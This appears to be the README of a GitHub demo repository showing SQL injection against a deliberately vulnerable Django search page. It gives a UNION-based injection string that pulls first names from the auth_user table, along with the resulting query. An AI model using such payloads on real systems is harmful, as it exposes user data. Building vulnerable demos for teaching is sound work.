Imandaneshi/sql-injection-attack-demo

A Django SQL Injection Attack Demo

PythonGPL-3.0

How to perform a SQL Injection Attack

Steps

pip install Django
python manage.py runsever
http://127.0.0.1:8000/items/search
SELECT name FROM orders_item WHERE name LIKE '%' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '%'
Search for "z' UNION SELECT first_name FROM auth_user WHERE first_name LIKE '"